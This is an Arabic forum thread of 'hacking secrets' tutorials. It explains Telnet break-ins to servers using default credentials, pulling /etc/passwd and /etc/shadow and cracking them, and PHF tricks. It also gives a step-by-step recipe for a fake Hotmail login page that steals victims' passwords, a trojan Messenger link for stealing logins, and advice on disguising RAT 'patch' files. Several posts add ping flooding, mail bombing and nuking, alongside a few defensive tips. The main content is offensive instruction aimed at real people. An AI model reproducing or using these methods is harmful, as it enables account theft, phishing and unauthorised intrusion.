550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
------------------------
Telnet
ما هي التيل نت ؟
التيل نت هي أداة قديمة في لينوكس(Linux) وينوكس(Unix) وأصبحت الآن موجودة في ويندوز .
==========================
كيف يتم استخدامها سابقا ؟
كانت تستخدم للتصفح بحيث ان مواقع الانترنت كانت مجرد نصوص بدون صور ... تخيل كم كانت الشبكة كئيبة ...
==========================
كيف يتم استخدامها الآن ؟
1 ــ قراءة بريدك الالكتروني بالطريقة التالية :
اذهب إلى متصفحك واكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وسوف يطلب اسم مستخدم وكلمة مرور(طبعا بعد ان يفتح التيل نت) ضع اسم بريدك
وكلمة السر الخاصة بك واقرأ بريدك واتخدم الأمر Del msg#1 لحذف الرسالة
الأولى وغير الرقم 1 برقم الرسالة المراد حذفها .

==================
2 ــ اختراق الأجهزة :
ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف \ إضافة \ إزالة الملفات فيه ...
تتم أيضا بنفس الطريقة من متصفحك اكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ
القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :

21 - 25 - 32(الأساسي) - 99 - 2001
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال
==================
3 ــ اختراق المواقع :
يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في مو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
اسم المستخدم : كلمة المرور
anonymous : anonymous
guest : guest
root : root
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكس Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
young
test
لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
أي الحسابات الغير محمية بكلمة سر .
اكتب الأمر :
GET /etc/passwd و GET /etc/group و GET /etc/shadow
ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
data = download
لكي تتمكن من التحكم بالملفات .
===================================
ماهو الملف psswd ?
الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
ملاحظة للمبتدئين : الـroot
هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن
يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su
username ولن يحتاج إلى باسوورد .

هذا الملف في ثلاث حالات :
1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
3 ــ متروك مثل ما هو ..
لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
الباسووردات مشفرة ... سوف تراها كالمثال التالي :
sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
هنا سوف نعرف المعلومات التالية:
1 ــ اسم المستخدم : sirhack .
2 ــ كلمة السر : 89fGc%^7 .
3 ــ الاسم الحقيقي : Sir Hackalot .
4 ــ مجلد الحساب : usr/sirhack/
5 ــ الغلاف(هنا الكلام في ينوكس او لينوكس) : bin/sh/
كما رأيتم فكلمة السر مشفرة .
===================================
ما هو الملف group ?
هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .
===================================
ما هو الملف shadow ?
في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...
===================================
كيف أفك التشفير ؟
استخدم أحد برنامجين :
1 ــ Cracker Jack .
2 ــ John the ripper .
وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكس(وينوكس) ...

نسخة اللينوكس
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

نسخة الويندوز
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

++++++++++++++++++++++++++++++++++++++++++++++++++



التل نت اداة فقط بس هذي الاداة ضرورية في كل شي المهم راح اشرح اليوم طريقة الاختراق جربتها مره وصارت
وهي تعتبر من اسهل طرق الاختراق
خلينا نفسم الدرس الى اربع اقسام

بسم الله بدانا
القسم الاول:
اول شي ضروري نعرف بعض الاوامر الليونكس السهلة
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
هذي مهمة جدا لنبدأ التعليم
واكو بعد WHO هذي اذا تعرف
منو موجود على السيرفر وبعد اكو FINGER (اسم المستخدم) بين FINGER اسم
المستخدم مسافة بدون الاقواس المهم ويا هذي الاوامر راح نقدر نتماشى ويا
الدرس


القسم الثاني:
نظام اليونكس او السيرفر
مالته يحتفظ في كلمات السر في etc directory/ واسم الفايل passwd انته هسه
تتوقع انك بس حصلت هذا الملف انتهى الموضوع وصرت هاكر لا

انته غلطان ميه بالميه لانو الباسيوردات مشفره ومستحيل تقدر تطلع الباسيورد منها
بس اكو حل اكو برنامج اسمه Cracker Jack هو مثل القاموس للتشفير يحتوي على الكثير من الباسيودات تقدرتنزله [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتقدر تحصل باسيوردات اكثر
في sable.ox.ac.uk/pub/wordlists تنزله هو حوالي 4 ميجا بايت مظغوط يصير 8
ميجا بايت لاوم تحطه في ملف البرنامج

انا ان شاء الله راح اشرح برنامج Cracker Jack عن قريب بس اكو فايل موجود في البرنامج يعلمك المهم

القسم الثالث(الاصعب):
النظام يحفظ الباسيوردات
احنا ما نقدر ندخل على السيستم لانو احن مو مصرح لنا المهم شلون نجيب ملف
الباسيورد في طريقتين سهلات بس احيانا تشتغل

اولها تدخل للسيستم كانك
anonymously لما تدخل مرات ftpمايكون مانع الدخول لملف الباسيوردات انته
عليك تسوي etc directory/ تشوف اذا الباسيورد عليها حظراو لا اذا

ماكو عليها حظر بسهولة نزل
ملف الباسيورد وشغل البرنامج Cracker Jack وطلع الباسيورد ومبروكة عليك بس
اذا جان عليها حظر لازم تجرب الخطة الثانية في ملفات اسمها PHF هذي تحوي
على كل شي باسيوردات وملفات والتحكم


فانته شلون تدخل عليها تفتح الاكسيبلوير
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ملاحظة بدال الاكسات تكتب عنوان الموقع انا نجحت بالدخول على موقع عن طريق هذا بالمناسبة تقدر تخترق منتدى عن طريق هذي الحركة
اذا ما نجحوا الحركيتن
معناها الباسيورد مضلل يعني موجود هذا النظام لحفظ الباسيوردات اللي انته
ما تقدر تدخل عليها بس ماكو شي مستحيل

مرات في بعض الانظمة يكون
السيستم بيه backup للباسوردات وتقدر تبحث عنه مثلا في etc/shadow/ بس
يمكن تشتغل ويمكن ما تشتغل انته وحظك

ولهذا السبب انا معجب جدا في نظام apache لانه نظام رائع جدا ولايمكن اختراقه بسهولة

الجزء الرابع:
زين هسه حصلت الباسيوردمال اليوزر نيم اللي تريد تخترقه شلون تقدر تاخذها الك؟؟
شوف
تفتح التل نت وتدخل على
السيرفر وتكتب اليوزر نيم والباسيورد بعدني تقدرتسوي اللي يحلو لك طبعا
لكل سيرفر اوامر يوجد امثلة على السيرفر


UNIX,linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms)

ملاحظة:يا اخوان انا لو اعرف
نظام اليونكس جيدا كان جعلت من نفسي هاكر قوي ولكني كنت تحت غشاوة البرامج
بس هسه الحمد لله بديت اتعلم الليونكس ثم سابدا بنظام اليونكس

وان شاء الله ذلك سيساعدني على جعل من نفسي كل الهاكرز الحقيقن يعتمدون على اليونكس وليش على البرامج فيا اخوان شيلوا عنكم غشاوة
السب سفن وغيره وما عليك الا
تتعلم من كتب او تاخذ كورس براحتك وانا مستعد اورك ابواب مال الهاكرز راح
تتعجب انا ما اقور هذا الكلام ني خبير او اي شي ثاني

اقوله دعوة الكم والي حتى نبدأ بالطريق الصحيح للهاكرز


الطاعون
+++++++++++++++++++++++++++


إغلاق المنافذ port الموجودة بالجهاز

اول شيء بقوله انه الكثير
منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى
بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ......


اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .


اتمنى اتبا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 20:43

بسم اللة الرحمن الرحيم



هل مللت ممن يتوعدك بسرقة بريدك ؟؟؟ هل بالفعل سرق بريدك؟!؟هل تريد حلا مأبدا لهذه المشكلة!!
هل تريدهم يجثون امامك ويطلبون السماح؟؟ هل انت هكر مبتدئ؟؟حتى ولو كنت لا تعرف شيئا عن الهكر
او كنت هكر متقدم!هنـــــا الحل فالحل دائمـــا يريد شخصا ذو صبر وذو
إصرار وعزيمة !هل تملك هذه المقومات؟؟ يمكنك الان جذ رؤوسهم ويمكنك
الاغتسال بدمائهم نعم الان بلا برامج بلا اية خبرة بالهكر
تفضلو ا الطريقة كل ما عليك فعله ان تفعل الخطوات التى سوف ادرجها وإليك
الخطوات مع العلم ان هذه الطريقة جديدة وهي من اختراعي شخصيا!!!!


بعدما قمت بتحليل موقع الهوتميل والياهو ونسيج اكتشفت ان جميع هذه الشركات
تستخدم نفس الخدمة حتى موقع اين ... وباقي المواقع فهذه الطريقة هي
المتوفرة لهم كشركات انتم لا تعلمون عن ماذا اتحدث ؟
سوف اقول لكم :الان انت ايها القارئ حين تريد الدخول على بريدك على الهوتميل لااااااااااحظ!!!!
انك تقوم بكتابة البريد كاملا!!!والباسبورد ثم تضغط على سنقل او دخول سوف تخرج لك الان صفحة بها ارقام لاحظ متصفحك ارقام كهذه [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وتكون عادة طويلة وبعد ثواني يقوم الماسنجر بفتح بريدك الثغرة موجودة في هذه الصفحة انتبااااه ركز جيدا معي

حين تقوم بكتابة بريدك وباسبوردك يقوم سيرفر الهوتميل بإرسال هذه
المعلومات إلى مزود خدمة البريد ويقوم المزود بالبحث عن البريد المدخل ومن
ثم التحقق من الباسبورد وبعد ذلك تدخل على بريدك وكل هذا في ثواني


طريقة العمل لإختراق ><:

كل ما سنقوم به هو ان يصبح بريدك الموجود على الهوتميل مثلا
هو>>>مزود خدمة البريد<<<يعني بالعربي
>>>>>اول ما الشخص يدخل على بريده ويقوم سيرفر الهوتميل
بإرسال الرسالة إلى مزود البريد
الخاص بالهوتميل تتحول هذه الرسالة وتصير تجي على بريدك وكذا تكون انت
قطعت راسه والقيته في الحاوية!!!!!!!!!!!؟؟؟؟ وإذا جت على بريدك تدخل انت
على الهوتميل وتدخل البريد مال الضحية وباسبورده كمان وتدخل على بريد
الضحية واول ما تدخل تغير الباسبورد والاعدادات من البلد والمدينة وهذه
الاعدادات ضرورية عشان إذا ما غيرتها يقدر هوه يسترجع بريده وانت ما تحس.

نبدأ بالجد الان : قبل ما تبدأ التطبيق يجب عليك قراءة المقدمة لانها مفتاح العمل ونبدأ الان على بركة الله
مثال











[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
مثال للياهو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]























12-قم بفتح الصفحة الجديدة إلى انت مغير بها الالوان ببرنامج >المفكرة<





16-قم بإستبدال هذا البريد >>وهوه بريد مزود خدمة الايميل<< وضع بريدك وبعد كذا اضغط على حفظ


ما تنكشف وتخرب الخطة










1-قم بالدخول على صفحة الهوتميل الخاصة باللغة الضحية يعني لو عربي ادخل
على الهوتميل العربي ولو عبري ادخل على الهوتميل العبري ولو اسباني ادخل
على صفحة الهوتميل الاسبانية ...الخ

2-يجب ان تكون على علم باللغة الضحية يعني لو هوه امريكي يجب ان تكون
تتحدث الانجليزية الامريكية بطلاقة >>>لا تسأل ليش بعدين تعرف
جايك الشرح <<<

3-قم بحفظ صفحة الهوتميل الي من خلالها تقدر تدخل على بريدك >>إلى
بها خانة لإدخال بريدك وخانة اخرى لادخال الباسبورد بس تكون بلغة الضحية
طبعا <<< احفظها على سطح المكتب وسوي لها تزامن >>عشان
تقدر تتصفح الصفحة بدون اتصال<<<

4-قم بفتح الفرونت بيج

5-قم بفتح صفحة الهوتميل بالفرونت بيج

6-قم بتغيير الوان الصفحة فقط!! يعني لو لونها ازرق خلي لونها وردي

7-بعد تغيير الالوان قم بكتابة العبارة التالية او عبارة مماثلة فوق خانة إدخال البريد

8-اكتب "للدخول للماسنجر الذهبي الخاص والسري الذي يمكنك مشاهدة من تتحدث
معه بدون ان يعلم الرجاء ادخال بريدك وكلمة مرورك للدخول "*هذه الخدمة
مجانية وجديدة*

9-لا تقم بتغيير اي صور بالصفحة

10-احفظ الصفحة باسم طويل وكله ارقام وحروف وليس كلمات مثال

11-b7m7hg7jg8l768765yt8oi9poi8768opiutrtyuyurt9876587 54oiuputeiy87


14-سوف يخرج امامك شفرات كأنها شفرات صاروووخ ههههههههه

15-قم بالبحث بين هذه الشفرات عن hotmail.com@***


17-الان قم بتنزيل هذه الصفحة على موقع مجاني او غير مجاني بشرررررط انه لا يطلع اعلانات عشان

18-وهناك شرط اخر وهو ان يكون اسمها كما هو طويل

19-الان قم باللعب على الضحية وقول له: تبي ما سنجر ذهبي رائع وبه حركات
بس لازم اول تدخل على موقع الهوتميل وبعدين تقدر تحمله اعطه الان اللنك
وهوه ما راح يكتشف الخطة لان الرابط طويل واول ما يدخل على الموقع ويكتب
بريده وباسبورده فورا افتح بريدك راح تلقاهم ببريدك يرتجفون خوف منك
تستطيع بهذه الطريقة تسرق مليار بريد بس انتا وشطارتك ههههههههه
>>ياواد ياديجتال<< انتهى الشرح وشكرااا





[size=25]ولمن يرغب بالصفحة جاهزة للرفع من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]مع مراعاة تعديل ايميل التبليغ


او هنا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


[/size]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 21:24

طريقة سرقة ايميل من يكلمك على الفور


يجب ان تكون اون لين وتكون وتتكلم مع الضحية وارسل له هذه الوصلة


<http://mypage.ayna.com/amz90/massenger.exe>



اقنعه انه يضغط عليها


وثم اكتب له M$Ncomandos


وثم تشوف الماسنجر اصبح اوفلاين وثم اكتب



M$Npassw


بعده بتشوف الايميل والباسورد معاك فى الشات



لكنه ماراح ياخذ باله وانت اللى تكسب في النهاية


عاد اني شفت هالموضوع وحطيته
بس لاتضمنون انه يكون مضبوط او صحيح


رد باقتباس
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 21:54

منقول للفائدة



السـلآم عليكم ورحمة الله وبركاته




كلنا يستعمل أثناء عمله على الكمبيوتر و خصوصا الإنترت
اختصارات لوحة المفاتيح (الكيبورد) لاسيما منها


النسخ
Ctrl+c
و اللصق
Ctrl+v





بتركيبة من لغات البرمجة ك ********** و ASP تستطيع بعض المواقع تسجيل ماقمت بنسخه
على الشاشة سواء كان نص أو كلمة مرور أو رقم لبطاقة بنكية الخ...


يمكنكم التأكد مما قلته بنفسكم }~
في البداية ظلل أي نص تريده و قم بنسخه Ctrl+c
اذهب لهذا الموقع ستجده ملصقا هناك



[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] com/computer/ clipboard


ماذا يحدث في حالة وجود رقم بطاقة الفيزا أو اسم دخول
أو كلمة السر للبنك أو الأرقام السرية، أو غيرها في الحافظة


أي أنه يمكن لأي هكر الاستفادة من المعلومات المخزنة في الحافظة

المشكلة والحل


نقوم أحيانا' بنسخ بعض المعلومات باستخدام
( ctrl+c )
لنقلها في مكان آخر.
هذه المعلومات المنسوخة يتم تسجيلها في الحافظة أو ما يعرف بالـ
( clipboard )
و قد تكون سهلة الوصول عن طريق
الشبكة بواسطة الربط بين الـ
( **********s ) و الـ( ASP ).
تجنب الاحتفاظ المعلومات الخاصة مثل
( رقم بطاقة الفيزا، اسم دخول و كلمة السر للبنك، الأرقام السرية، تاريخ الميلاد، الخ .... )
في الـ( clipboard )
عند التجول بين صفحات الإنترنت، و لكن حاول كتابتها دائما'.
لأنه من السهل الوصول و التعرف عليها لدى بعض المخترقين لجهازك عند الاحتفاظ بها في
الـ( clipboard )
لسرقة معلوماتك المهمة.
تذكر أن القانون الإلكتروني لن يحميك.




فقط جرب هذه الطريقة لتتأكد :
- انسخ أي كلمة أو سطر بواسطة الـ
( ctrl+c ) من اختيارك.


الآن اضغط على الرابط التالي مره أخرى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] com/computer/ clipboard


ستلاحظ أن ما قمت بنسخة مسبقا' قد تم نقلة و لصقه في تلك الصفحة.



لتجنب هذه المشكلة .... اتبع الخطوات التالية :
- اذهب إلى : internet options-
ثم >security
- اضغط على : custom level
- ابحث عن ( Allow paste operations via ****** ) تحت قائمة
( ******ing )
... و اختر
( Disable )

شيء مخيف أنه يمكن أن تكتشف معلوماتك الخاصة بهذه السهولة ..


هذي اول مشاركتي فالقسم


معرف اذا الموضوع في مكان مناسب او لا


الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالخميس 15 يوليو 2010 - 9:48

اقفل اي جهاز عن طريق runاو الدوس ادخلوا


بسم الله الرحمن الرحيم
اقدم لكم بختصار الاوامر التاليه:

اذهب الي قائمة start بعدها اذهب الي run و اكتب الامر التالي shutdown -i
سوف تخرج لك نافذه وهي عباره عن ريموت تضع ابي الجهاز الذي تريد ان تقفله بكل سهوله على زر add وبعدها تقدر تعمل الي بدك عن طريق الخيرات الموجوده امامك

ملاحظه هذه الطريقه ممكن ان لا تكون مفعله على الاجهزه الموصوله عبر الراوتر


الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالخميس 15 يوليو 2010 - 10:20

سلسلة تعليم الهكرز للمبتدئين أرجو التثبيت


هادي اول سلسلة من سلسلة تعليم الهكر للمبتدئين وان شاء الله اكون قادر على ايصال المعلومات بالطريقة الصحيحة ..

اول شي نبدا بهاك الأجهزة................

هاك الاجهزه ----------

نوعين : -

هاك بالثغرات : موضوع طويل شوي و صعب و يستخدمه الخبراء ولكن سأشرحه بالسلسلة الثانية..

هاك بالباتشات : سهل و بسيط و سريع و قوي نوعا ما و عاده ما نبدء به



طيب هلأ ايش هي برامج الباتشات هذه و كيف تعمل







اي برنامج باتشات في الدنيا يحتوي على 4 اشياء( مثل sub7)



1: ملف الباتش : وهو ملف يجب ارساله للضحيه و يجب على الضحيه فتحه ايضا حتى يفتح عنده منفذ (port) ثم نستطيع اختراقه ..

2: ملف Edit server : وهو لوضع اعدادات الباتش او تغييرها ..

3 : ملف البرنامج الاساسيوهو ال client : وهو الذي تتصل به للضحيه و تتحكم في جهازه ..

4: ملفات ال dll و غيره ..



و طبعا لازم لما ترسل الباتش لازم تتحايل على الطريقة اللي رح ترسلها لأنو الغالبية صارت تخاف من ملفات ال exe غيرها ..

وممكن تغير امتداد الباتش عن طريق البرامج المختصة وتحولها الى swf او اي شىء ثاني ماعدا صيغة الصور jpg ما تقدر ولا يصير اصلا و لاتصدق اصلا انوا تقدر تخلي ملف ال exe تقلبول ل jpg ....



طيب هلأ لو بدنا نخترق واحد ايش نحتاج



1: برنامج ..

2: ضحيه نرسل لها الباتش وتقوم بفتحه

3: ايبي الضحيه و يمكن معرفته عن طريق اكثر من طريقة منها عن طريق الشات بواسطة الأمر netstat -n



كيف نحمي نفسنا من الهكر ؟ 1 : تأكد من نظام الملفات التي تستقبلها ( لاتستقبل اي شي exe ومو برنامج لانها امتداد الملفات التشغيليه. او استقبلها ولا تفتحها الا بعد فحصها)

3 : نزل برنامج حمايه حلو

4:دائما قبل دخولك للأنترنت ابحث على ملف نهايته *.pwl موجود بالسي وأحذفه لأنو يحتوي على كافة باسورداتك وهادا اهم خطوة.. والقلة التي تعرف اهمية الخاصية هادي..

5:دائما احذف ملفات ال cookies التي تكون موجودة داخل مجلد ال windows

6:دائما حاول انك تسوي update لكل البرامج التي عندك واهما برامج الحماية والمتصفح لأن هناك ثغرات بالمتصفح يمكن ان تخترق عن طريقها دون الحاجة لأرسال باتش..



وهناك اكثر من طريق اخرى للحماية سأذكرها بدرس مقبل...





==============================================



اختراق المواقع ---------------

موضوع أيضا طويل



ثلاث طرق لاختراق المواقع

1: استخدام الثغرات

2: بعض أنظمة التشغيل القويه مثل اليونكس و اليونكس

3: برامج اللسته : و هي الأطول وللمبتدأين



وتعتمد برامج اللسته عل لستة كبيره تحتوي اكبر قدر ممكن من الكلمات بالاضافه الى البرنامج الأساسي الذي يستخدم اللسته في تخمين كلمة السر



==============================================



تدمير المواقع --------------

وهي عن طريق برامج ping وهي التي تبطئ الموقع و تثقل حتى يتوقف وتكون اما عن طريق الدوس او برامج معينه مثل evil ping وتحتاج الى عدد كبير من المشاركين تصل الى اكثر من 20 شخص حتى يأثروا بالموقع..



=============================================



اختراق البريد ------------- عدد لانهائي من الطرق و الحيل

ولكنه ليس صعب ولكن يحتاج الى الذكاء

ومن اسهلها ان تخترق جهاز الضحيه بأحد برامج الأختراق وتذهب الى قائمه الباسووردات المحفوضه ( اذا كان حافض الباس وورد راح تلقاها مع اسم بريده)

شفتوا الحين ليش لازم نحذف ملف الباسورد

==============================================



تدمير و تفجير البريد --------------------



وهو سهل و بسيط عن طريق إغراق البريد بإرسال حتى يتوقف و هناك برامج تسهل تلك العملية



==============================================



Nuke Programs ---------------



وهي برامج تقوم بفصل صاحب الايبي من الاتصال



==============================================



Spoofing Programs ------------------



وهي تغير الايبي الى رقم آخر و يستفاد منها في الاختراق و بعد الأوقات تتوقف عليها اي بمعنى اخر للتمويه حتى لا يتمكن احدا من معرفة ال ip الحقيقي لجهازك..



==============================================



Cookies --------

هي عبارة عن عن ملفات يرسلها الموقع لمتصفحك و هي عباره عن ملف مكتوب لا يستطيع أي موقع قر ائته غير هذا الموقع و قد يكون به كلمات

سر موقع أو اشتراك ...

وهي مزعجه في بعض الأحيان حيث أنها مثلا تسجل كل المواقع التي دخلتها و كل الصفحات

التي شاهدتها و مدة مشاهدة كل صفحه ...

لذلك فهي خطيرة جدا ..

شوفتوا هلأ ليش ملفات الكوكيز لازم نحذفها





===============================================



Ports

--------

وهي المنافذ التي يتسلل منها الهكرز لجهازك



===============================================



Port Scanner -------------

وهي برامج تفحص المنافذ المفتوحة لديك و تخبرك بها و تخبرك عن البرنامج المسؤول عنها مثل super scan برنامج xhack برنامج ممتاز وايضا عن طريق احد المواقع اللتي يفحص جهازك مجانا مثل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



-----------

الفيروسات

-----------

=============



وهي من اخطر الأشياء على الجهاز



كيف تحدث الإصابة بالفيروسات ؟ -----------------------------

يتنقل الفيروس إلى جهازك عندما تقوم بنقل ملف ملوث بالفيروس إلى جهازكاو عند زيارة احد المواقع المشبوهة او اثناء تبادل السي ديات او الديسكات مع الأصدقاء و ينشط الفيروس عند محاولةفتحه ويمكن ان يصلك ايضا عن طريق البريد الألكتروني..



الفيروس عبارة عن برنامج صغير و ليس من شرطا أن يكون للتخريب فمثلا هناك فيروس صممه أحد الفلسطينيين

يفتح لك واجهه و يبين بعض الشهداء الفلسطنين و يعطيك بعض المواقع عن فلسطين ...



ويمكن عمل هذا الفيروس بطرق كثيره و بسيطة حيث انك يمكن تصميمه بلغات البرمجة مثل ال visual basic او c++ وغيرهأو حتى باستخدام Notpad







أنواع الفيروسات ================



1: فيروسات التشغيل (Boot Sector Virus)

وهو الذي ينشط في منطقة نظام التشغيل وهو من اخطر أنواع الفيروسات حيث انه يمنعك من تشغيل الجهاز



2: فيروسات الماكرو (Macro Virus) وهي من اكثر الفيروسات انتشارا حيث انها تضرب برامج الاوفيس و كما أنها تكتب بالورد او Notpad



3: فيروسات الملفات (File Virus) وهي تنتشر في الملفات وعند فتح أي ملف يزيد انتشارها ..



4: الفيروسات المخفية (Steath Virus) وهي التي تحاول آن تختبئ من البرامج المضادة للفيروسات و لكن سهل الإمساك بها



5: الفيروسات المتحولة (Polymorphic virus) وهي الأصعب على برامج المقاومة حيث انه صعب الإمساك بها وتتغير من جهاز إلي آخر في أوامرها ..

ولكن مكتوبة بمستوى غير تقني فيسهل إزالتها



6: فيروسات متعددة الملفات (Multipartite Virus) تصيب ملفات قطاع التشغيل و سريعة الانتشار ..



7: فيروسات الدودة (Worm) وهو عبارة عن برنامج ينسخ نفسه على الاجهزه و يأتي من خلال الشبكة و ينسخ نفسه بالجهاز عدة مرات

حتى يبطئ الجهاز وهو مصمم لإبطاء الشبكات لا الأجهزة

و بعض الناس تقول امه هذا النوع لايعتبر فيروس حيث انه مصمم للإبطاء لا لأزاله الملفات و تخريبها ..



8: الباتشات (Trojans) وهو أيضا عبارة عن برنامج صغير قد يكون مدمج مع ملف آخر للتخفي عندما ينزله شخص و يفتحه يصيب

ال Registry و يفتح عندك منافذ مما يجعل جهازك قابل للاختراق بسهوله و هو يعتبر من أذكى البرامج

فمثلا عند عمل سكان هناك بعض التورجن يفك نفسه على هيئة ملفات غير محدده فيمر عليها السكان دون التعرف علية

و من ثم يجمع نفسه مره ثانيه





برامج المقاومة ===============



كيف تعمل ؟

----------

هناك طريقتان في البحث عن الفيورسات

1: عندما يكون الفيروس معروف من قبل فتبحث عن التغير المعروف لها مسبقا الذي يسببه ذلك الفيروس

2: عندما يكون الفيروس جديد فتبحث عن شئ غير طبيعي في الجهاز حتى تجده و تعرف أي برنامج مسبب له وتوقفه..



ودائما و غالبا تظهر نسخ عديده من الفيورس و لها نفس التخريب مع فروق بسيطة







اشهر الفيروسات --------------

اشهر الفيروسات على الإطلاق هو شيرنوبل و مالسيا و فيروس الحب Love ..





هل جهازك مخترق ؟

-----------------

Start ---> Run ----> System.iniأذهب الى التالي:

star--->run--->win.ini

وابحث عن القيم التالية

run=xxx.exe أو run=xxx.dll أو load=xxx.exe أو load=xxx.exe

مع ملاحظة ان xxx هو اسم الخادم أو السيرفر.وإذا عثرت على اي قيمة منها فقم بحذفها.

Start ---> Run ----> System.ini

أذهب للسطر الخامس

لو كان :-

User.exe=User.exe

جهازك سليم

أما لو وجدته :-

User.exe=User.exe*** *** ***

إذن جهازك تم اختراقه



ولكن ازا تم اختراق جهازك عن طريق الثغرات فلا يمكنك معرفة انه تم اختراقك بهذه الطريقة لذلك نجد هنا اهمية برامج الحماية كا blackice و zonealarm في انها تخبرك ازا قام احدهم باختراق جهازك عن طريق الثغرات...







تم اختراق جهازي ماذا افعل --------------------------

فرمت الجهاز و ريح نفسك لام هناك بعض الباتشات التي تفك و تركب نفسها

اما اذا أردت انا لا تفرمت الجهاز

اذ1 عليك ان تنزل برنامج The Cleaner و Zone alarm وAd ware

الاول تعمل به سكان للجهاز لكشف الباتشات و ازالتها

و الثاني firewall للحمايه

و نزل انتي فايروس و اعمل به سكان أيضا





أيهما افضل لكشف ملفات الباتشات هل هي البرامج المتخصصة لذلك ام النتي فايروس؟

----------------------------------------------------------------------------

الانتي فايروس لانه الاكثر انتشارا و يتم تحديثه بسرعه اكبر من اي شئ اخر

فاذا تم ظهور اي باتش جديد بعد ثلاث ساعات مثلا تكون الشركه قد جهزت له المضاد







كيف احمي نفسي؟

--------------

1: التأكد من نظافة الملفات قبل فتحها مثل exe لانها ملفات تشغيليه واذا ارسلك واحد شي وهو ماهو برنامج وامتداده exe معناه ممكن يكون فيروس

2: عمل سكان كامل على الجهاز كل ثلاث ايام

